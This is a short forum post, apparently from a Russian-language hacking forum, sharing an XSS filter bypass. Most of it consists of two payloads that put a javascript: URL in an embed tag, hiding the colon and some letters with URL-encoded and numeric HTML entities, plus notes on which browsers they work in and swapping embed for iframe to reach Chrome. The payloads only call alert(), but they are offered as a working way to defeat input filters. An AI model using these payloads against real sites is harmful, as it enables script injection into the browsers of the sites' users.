• XSS.stack #1 – первый литературный журнал от юзеров форума

Небольшой XSS filter bypass

Отслеживать
pablo

pablo

(L2) cache
Пользователь
Регистрация
01.02.2019
Сообщения
433
Реакции
1 524
Небольшой XSS filter bypass
Код: 
<embed src="javascript%26%63%6f%6c%6f%6e%3balert()">
The url encoded portion is the html entity for colon:
&colon;

Более короткая версия: &#x3a; или &#58; вместо &colon;
Также можно менять в сорце:
Код: 
<embed src="jav&#97;scr&#105;pt&#x3a;ale&#114;t()">
Работает на Mozilla FF, не работает на Chrome. Для работы на Chrome измените embed на iframe.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх